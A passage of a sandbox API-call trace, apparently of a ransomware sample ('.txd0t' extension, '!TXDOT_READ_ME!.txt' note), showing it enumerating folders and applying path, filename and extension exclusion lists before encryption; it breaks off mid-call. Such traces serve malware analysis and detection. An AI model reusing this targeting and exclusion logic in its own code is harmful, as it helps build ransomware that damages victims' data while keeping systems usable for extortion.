(lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.844] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58fb57b2, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58fb57b2, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Extended", cAlternateFileName="")) returned 1 [0128.844] StrCmpW (psz1="Extended", psz2=".") returned 1 [0128.844] StrCmpW (psz1="Extended", psz2="..") returned 1 [0128.844] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.844] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.844] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Extended", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Extended") returned="C:\\588bce7c90097ed212\\Extended" [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\windows\\system32\\") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\windows\\system\\") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\appdata\\local\\") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\boot\\") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\perflogs\\") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\programdata\\") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\drivers\\") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\wsus\\") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="crypt_detect") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="cryptolocker") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="ransomware") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="C:\\WINDOWS") returned 0x0 [0128.844] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.845] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Extended", lpSrch="C:\\Program Files") returned 0x0 [0128.845] GetProcessHeap () returned 0xe30000 [0128.845] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4be) returned 0x6874278 [0128.845] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Extended", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended") returned="C:\\588bce7c90097ed212\\Extended" [0128.845] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended", psz2="\\*", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\*") returned="C:\\588bce7c90097ed212\\Extended\\*" [0128.845] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Extended\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58fb57b2, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58fb57b2, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.845] StrCmpW (psz1=".", psz2=".") returned 0 [0128.845] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf378ed8a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58fb57b2, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58fb57b2, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.845] StrCmpW (psz1="..", psz2=".") returned 1 [0128.845] StrCmpW (psz1="..", psz2="..") returned 0 [0128.845] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58ef6ad6, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x58ef6ad6, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58fb57b2, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.845] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.845] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.845] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Extended", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended") returned="C:\\588bce7c90097ed212\\Extended" [0128.845] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\") returned="C:\\588bce7c90097ed212\\Extended\\" [0128.845] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\Extended\\!TXDOT_READ_ME!.txt" [0128.845] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.845] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.845] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.845] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.845] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.845] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.845] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.845] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.845] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.845] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.845] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.845] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.845] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.845] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.845] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.845] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.846] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a714f00, ftCreationTime.dwHighDateTime=0x1cac6f0, ftLastAccessTime.dwLowDateTime=0x2a714f00, ftLastAccessTime.dwHighDateTime=0x1cac6f0, ftLastWriteTime.dwLowDateTime=0x58ef6ad6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16e82, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Parameterinfo.xml.txd0t", cAlternateFileName="PARAME~1.TXD")) returned 1 [0128.846] StrCmpW (psz1="Parameterinfo.xml.txd0t", psz2=".") returned 1 [0128.846] StrCmpW (psz1="Parameterinfo.xml.txd0t", psz2="..") returned 1 [0128.846] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Extended", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended") returned="C:\\588bce7c90097ed212\\Extended" [0128.846] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\") returned="C:\\588bce7c90097ed212\\Extended\\" [0128.846] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended\\", psz2="Parameterinfo.xml.txd0t", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.txd0t") returned="C:\\588bce7c90097ed212\\Extended\\Parameterinfo.xml.txd0t" [0128.846] PathFindExtensionW (pszPath="Parameterinfo.xml.txd0t") returned=".txd0t" [0128.846] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.846] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x58ef6ad6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9a8a, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="UiInfo.xml.txd0t", cAlternateFileName="UIINFO~1.TXD")) returned 1 [0128.846] StrCmpW (psz1="UiInfo.xml.txd0t", psz2=".") returned 1 [0128.846] StrCmpW (psz1="UiInfo.xml.txd0t", psz2="..") returned 1 [0128.846] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Extended", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended") returned="C:\\588bce7c90097ed212\\Extended" [0128.846] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\") returned="C:\\588bce7c90097ed212\\Extended\\" [0128.846] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Extended\\", psz2="UiInfo.xml.txd0t", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.txd0t") returned="C:\\588bce7c90097ed212\\Extended\\UiInfo.xml.txd0t" [0128.846] PathFindExtensionW (pszPath="UiInfo.xml.txd0t") returned=".txd0t" [0128.846] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.846] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a6a00, ftCreationTime.dwHighDateTime=0x1ca5de3, ftLastAccessTime.dwLowDateTime=0x79a6a00, ftLastAccessTime.dwHighDateTime=0x1ca5de3, ftLastWriteTime.dwLowDateTime=0x58ef6ad6, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x9a8a, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="UiInfo.xml.txd0t", cAlternateFileName="UIINFO~1.TXD")) returned 0 [0128.846] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.846] GetProcessHeap () returned 0xe30000 [0128.846] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.846] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="Graphics", cAlternateFileName="")) returned 1 [0128.846] StrCmpW (psz1="Graphics", psz2=".") returned 1 [0128.846] StrCmpW (psz1="Graphics", psz2="..") returned 1 [0128.846] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.846] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.846] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="Graphics", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0128.846] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\windows\\system32\\") returned 0x0 [0128.846] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.846] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\windows\\system\\") returned 0x0 [0128.846] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.846] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.847] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\appdata\\local\\") returned 0x0 [0128.847] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.847] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.847] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.847] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\boot\\") returned 0x0 [0128.847] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\perflogs\\") returned 0x0 [0128.847] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\programdata\\") returned 0x0 [0128.847] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\drivers\\") returned 0x0 [0128.847] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\wsus\\") returned 0x0 [0128.847] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.847] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.847] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="crypt_detect") returned 0x0 [0128.847] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="cryptolocker") returned 0x0 [0128.847] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="ransomware") returned 0x0 [0128.847] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="C:\\WINDOWS") returned 0x0 [0128.847] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.847] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\Graphics", lpSrch="C:\\Program Files") returned 0x0 [0128.847] GetProcessHeap () returned 0xe30000 [0128.847] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4be) returned 0x6874278 [0128.847] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0128.847] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\*", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\*") returned="C:\\588bce7c90097ed212\\Graphics\\*" [0128.847] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x730e91, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.848] StrCmpW (psz1=".", psz2=".") returned 0 [0128.848] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf36f6419, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf371c69a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf371c69a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.848] StrCmpW (psz1="..", psz2=".") returned 1 [0128.848] StrCmpW (psz1="..", psz2="..") returned 0 [0128.848] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Print.ico", cAlternateFileName="")) returned 1 [0128.848] StrCmpW (psz1="Print.ico", psz2=".") returned 1 [0128.848] StrCmpW (psz1="Print.ico", psz2="..") returned 1 [0128.848] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0128.848] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0128.848] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Print.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Print.ico" [0128.848] PathFindExtensionW (pszPath="Print.ico") returned=".ico" [0128.848] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0128.848] StrCmpIW (psz1="Print.ico", psz2="bootsect.bak") returned 1 [0128.848] StrCmpIW (psz1="Print.ico", psz2="iconcache.db") returned 1 [0128.848] StrCmpIW (psz1="Print.ico", psz2="thumbs.db") returned -1 [0128.848] StrCmpIW (psz1="Print.ico", psz2=" ransomware ") returned 1 [0128.848] StrCmpIW (psz1="Print.ico", psz2=" ransom ") returned 1 [0128.848] StrCmpIW (psz1="Print.ico", psz2="debug.txt") returned 1 [0128.848] StrCmpIW (psz1="Print.ico", psz2="boot.ini") returned 1 [0128.848] StrCmpIW (psz1="Print.ico", psz2="desktop.ini") returned 1 [0128.849] StrCmpIW (psz1="Print.ico", psz2="autorun.inf") returned 1 [0128.849] StrCmpIW (psz1="Print.ico", psz2="ntuser.dat") returned 1 [0128.849] StrCmpIW (psz1="Print.ico", psz2="ntldr") returned 1 [0128.849] StrCmpIW (psz1="Print.ico", psz2="ntdetect.com") returned 1 [0128.849] StrCmpIW (psz1="Print.ico", psz2="bootfont.bin") returned 1 [0128.849] StrCmpIW (psz1="Print.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.849] PathFindExtensionW (pszPath="Print.ico") returned=".ico" [0128.849] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.849] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate1.ico", cAlternateFileName="")) returned 1 [0128.849] StrCmpW (psz1="Rotate1.ico", psz2=".") returned 1 [0128.849] StrCmpW (psz1="Rotate1.ico", psz2="..") returned 1 [0128.849] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0128.849] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0128.849] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate1.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" [0128.849] PathFindExtensionW (pszPath="Rotate1.ico") returned=".ico" [0128.849] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0128.849] StrCmpIW (psz1="Rotate1.ico", psz2="bootsect.bak") returned 1 [0128.849] StrCmpIW (psz1="Rotate1.ico", psz2="iconcache.db") returned 1 [0128.849] StrCmpIW (psz1="Rotate1.ico", psz2="thumbs.db") returned -1 [0128.849] StrCmpIW (psz1="Rotate1.ico", psz2=" ransomware ") returned 1 [0128.849] StrCmpIW (psz1="Rotate1.ico", psz2=" ransom ") returned 1 [0128.849] StrCmpIW (psz1="Rotate1.ico", psz2="debug.txt") returned 1 [0128.849] StrCmpIW (psz1="Rotate1.ico", psz2="boot.ini") returned 1 [0128.849] StrCmpIW (psz1="Rotate1.ico", psz2="desktop.ini") returned 1 [0128.849] StrCmpIW (psz1="Rotate1.ico", psz2="autorun.inf") returned 1 [0128.849] StrCmpIW (psz1="Rotate1.ico", psz2="ntuser.dat") returned 1 [0128.849] StrCmpIW (psz1="Rotate1.ico", psz2="ntldr") returned 1 [0128.849] StrCmpIW (psz1="Rotate1.ico", psz2="ntdetect.com") returned 1 [0128.849] StrCmpIW (psz1="Rotate1.ico", psz2="bootfont.bin") returned 1 [0128.849] StrCmpIW (psz1="Rotate1.ico", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.849] PathFindExtensionW (pszPath="Rotate1.ico") returned=".ico" [0128.849] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".ico") returned=".ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.849] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x730e91, dwReserved1=0x0, cFileName="Rotate2.ico", cAlternateFileName="")) returned 1 [0128.849] StrCmpW (psz1="Rotate2.ico", psz2=".") returned 1 [0128.849] StrCmpW (psz1="Rotate2.ico", psz2="..") returned 1 [0128.850] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\Graphics", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics") returned="C:\\588bce7c90097ed212\\Graphics" [0128.850] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics", psz2="\\", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\") returned="C:\\588bce7c90097ed212\\Graphics\\" [0128.850] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\Graphics\\", psz2="Rotate2.ico", cchMax=1086 | out: psz1="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" [0128.850] PathFindExtensionW (pszPath="Rotate2.ico") returned=".ico" [0128.850] StrCmpW (psz1=".ico", psz2=".txd0t") returned -1 [0128.850] StrCmpIW (psz1="Rotate2.ico", psz2="bootsect.bak") returned 1 [0128.850] StrCmpIW (psz1="Rotate2.ico", psz2="iconcache.db") returned 1 [0128.850] StrCmpIW (psz1="Rotate2.ico", psz2="thumbs.db") returned -1 [0128.850] StrCmpIW (psz1="Rotate2.ico", psz2=" ransomware ") returned 1 [0128.850] StrCmpIW (psz1="Rotate2.ico", psz2=" ransom ") returned 1 [0128.850] StrCmpIW (psz1="Rotate2.ico", psz2="debug.txt") returned 1 [0128.850] StrCmpIW (psz1="Rotate2.ico", psz2="boot.ini") returned 1 [0128.850] StrCmpIW (psz1="Rotate2.ico", psz2="desktop.ini") returned 1 [0128.850] StrCmpIW (psz1="Rotate2.ico", psz2="autorun.inf") returned 